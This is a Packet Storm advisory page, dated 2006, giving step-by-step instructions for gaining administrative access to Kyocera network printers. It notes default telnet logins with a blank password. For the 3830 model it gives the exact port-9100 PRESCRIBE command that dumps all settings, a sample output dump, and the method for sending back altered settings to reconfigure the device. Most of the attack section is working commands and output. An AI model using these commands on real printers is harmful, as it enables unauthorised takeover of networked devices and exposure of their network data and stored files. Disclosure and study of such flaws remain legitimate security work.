exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Kyoceraprinters.txt

Kyoceraprinters.txt
Posted Feb 20, 2006
Authored by evader | Site evader.wordpress.com

It is possible to gain administrative access on Kyocera 3830 printers by using telnet.

tags | advisory
SHA-256 | 7aeebf751b381ae2252541ba8745ebca6d719e929fef24288eb300f0b88b85f5

Kyoceraprinters.txt

Change Mirror Download
Kyocera Printers

Kyocera printers have various security flaws. Most of them can be telnetted to on the default port and accessed with the default username ?admin? and blank password. There is a very decent menu interface to change everything.

For the Kyocera 3830, which is a current model workgroup printer they disabled the telnetting to the default port for ?security?.
These printers, if they can be accessed, can provide up to around 100mb of storage, email facilities, networking information and various other details.

The 3830?s have a back door. Telnetting to port 9100 (the printer data port) allows you to send raw text to the printer, but if you drop the correct command in at this point, you can get full access to the printers settings. So here we go.

Telnet to port 9100 of a 3830.

Drop in this command and save the output:

!R!SIOP0,?COMREADBACK:0?;EXIT;

This will give you output similar to this:

CMNT Offset 0×006a Size = 1 ; SIOP0,?CUSTOM:Network Status Page = 0?;
CMNT Offset 0×006b Size = 1 ; SIOP0,?CUSTOM:TCP/IP BOOTP = 0?;
CMNT Offset 0×006c Size = 1 ; SIOP0,?CUSTOM:TCP/IP Protocol = 1?;
CMNT Offset 0×006d Size = 1 ; SIOP0,?CUSTOM:TCP/IP DHCP = 0?;
CMNT Offset 0×006e Size = 1 ; SIOP0,?CUSTOM:RARP = 1?;
CMNT Offset 0×006f Size = 1 ; SIOP0,?CUSTOM:ARP/PING = 1?;
CMNT Offset 0×0070 Size = 4 ; SIOP0,?CUSTOM:IP Address = 172.16.1.212?;
CMNT Offset 0×0074 Size = 4 ; SIOP0,?CUSTOM:Subnet Mask = 255.255.255.0?;
CMNT Offset 0×0078 Size = 4 ; SIOP0,?CUSTOM:Default Gateway = 0.0.0.0?;
CMNT Offset 0×007c Size = 256 ; SIOP0,?CUSTOM:Domain Name = ???;
CMNT Offset 0×017c Size = 4 ; SIOP0,?CUSTOM:DNS Server (Primary) = 0.0.0.0?;
CMNT Offset 0×0180 Size = 4 ; SIOP0,?CUSTOM:DNS Server (Secondary) = 0.0.0.0?;
CMNT Offset 0×0184 Size = 4 ; SIOP0,?CUSTOM:WINS Server (Primary) = 0.0.0.0?;
CMNT Offset 0×0188 Size = 4 ; SIOP0,?CUSTOM:WINS Server (Secondary) = 0.0.0.0?;
CMNT Offset 0×018c Size = 225 ; SIOP0,?CUSTOM:Scope ID = ???;
CMNT Offset 0×026d Size = 1 ; SIOP0,?CUSTOM:NetWare Protocol = 1?;
CMNT Offset 0×026e Size = 1 ; SIOP0,?CUSTOM:Frame Type = 1?;
CMNT Offset 0×026f Size = 1 ; SIOP0,?CUSTOM:Operation Mode = 1?;
CMNT Offset 0×0270 Size = 32 ; SIOP0,?CUSTOM:Print Server Name = ?admin??;
CMNT Offset 0×0290 Size = 32 ; SIOP0,?CUSTOM:Login Password = ???;
CMNT Offset 0×02b0 Size = 2 ; SIOP0,?CUSTOM:Queue Polling Interval = 4?;
CMNT Offset 0×02b2 Size = 1 ; SIOP0,?CUSTOM:NetWare Banner Page = 1?;
CMNT Offset 0×02b3 Size = 1 ; SIOP0,?CUSTOM:Bindery Mode = 1?;
CMNT Offset 0×02b4 Size = 32 ; SIOP0,?CUSTOM:File Server 1 = ???;

Now, if you want to change a setting just grab the part after the ?offset ;? section, insert your own text/ip address/whatever and throw it back on to the 9100 connection.

!R!SIOP0,?CUSTOM:LP1 End of Job String = ?!R! RES; EXIT;??;EXIT;

Your other option is to stick all the commands in a text file then do this from the unix prompt (without quotes):

lp -d?printername? ?textfilename?

Done and done.

Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    50 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    7 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close